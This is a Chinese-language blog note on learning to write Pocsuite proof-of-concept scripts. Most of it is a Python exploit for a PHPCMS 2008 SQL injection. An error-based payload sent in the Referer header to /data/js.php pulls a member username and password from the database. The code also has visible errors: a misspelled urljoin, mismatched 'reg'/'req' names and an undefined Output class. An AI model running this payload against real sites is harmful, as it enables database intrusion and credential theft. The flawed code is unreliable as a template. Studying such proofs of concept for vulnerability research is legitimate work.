在這里,首先向安全圈最大的娛樂公司,某404致敬。
參考博文 https://www.seebug.org/help/dev 向seebug平台及該文原作者致敬,雖然並不知道是誰
長話短說其實,可自由發揮的部分並不多,以原博文中的SQL注入的例子(web應用漏洞)來記錄自己的學習心得筆記。
感覺整篇POC能自己發揮的並不多,從代碼上看,幾乎90%的代碼照要求填寫即可,自由發揮的部分,基本就是構造URL payload,發包匹配回顯。嗯,就醬。
鐐銬起舞更美是不,哎,其他的照抄吧,自由發揮的部分主要在於漏洞研究,不在於開發代碼部分。抽時間還是要寫一寫的,想要個自己的站點balabala
1 #!/usr/bin/env python 2 # -*- coding:utf-8 -*- 3 4 #import system lib files 5 import os#並沒有用啊,我只是很喜歡這個庫的名字,覺得很好看 6 import re 7 import sys#並沒有用啊,我還是很喜歡這個庫的名字,覺得很好看 8 import json#並沒有用啊,我還是很喜歡這個庫的名字,覺得很好看 9 import urlparse 10 11 #import pocsuite lib file下面是要用到的pocsuite框架的一些函數或者類 12 from pocsuite.net import reg 13 from pocsuite.poc import POCBase 14 from pocsuite.utils import register 15 16 class mytest_poc(POCBase): 17 vulID = '62274' #漏洞編號-ssvid 18 version = 1 #poc version 19 author = ["no.1 author","no.2 author",...] #author name list 20 vulDate = '2011-11-21' #vul discory(report) date 21 createDate = '2015-09-23' #poc create date 22 updateDate = '2015-09-23' #poc update date 23 referercens = ["http://www.seebug.org/vuldb/ssvid-62274"] #參考文獻 24 name = '_62274_phpcms_2008_place_sql_inj_PoC' #poc script name 25 appPowerLink = 'http://www.phpcms.cn' #app vendor link 26 appName = 'PHPCMS' 27 appVersion = '2008' 28 vulType = 'SQL Injection' # 漏洞類型 29 desc = """balabala""" #描述 30 samples = ['http://10.1.200.28/'] 31 32 def _attack(self): 33 result = {} 34 vulurl = urlparse.urljson(self.url, '/data/js.php?id=1') 35 payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#" 36 head = { 37 'Referer': payload 38 } 39 resp = reg.get(vulurl,headers=head) 40 if resp.status_code == 200: 41 match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M) 42 if match_result: 43 result['AdminInfo'] = {} 44 result['AdminInfo']['Username'] = match_result.group(1) 45 result['AdminInfo']['Password'] = match_result.group(2) 46 return self.parse_attack(result) 47 48 def _verify(self): 49 result = {} 50 vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1') 51 payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#" 52 head = { 53 'Referer': payload 54 } 55 resp = req.get(vulurl, headers=head) 56 if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 57 result['VerifyInfo'] = {} 58 result['VerifyInfo']['URL'] = vulurl 59 result['VerifyInfo']['Payload'] = payload 60 61 return self.parse_attack(result) 62 63 def parse_attack(self, result): 64 output = Output(self) 65 if result: 66 output.success(result) 67 else: 68 output.fail('Internet nothing returned') 69 return output 70 71 register(mytest_poc)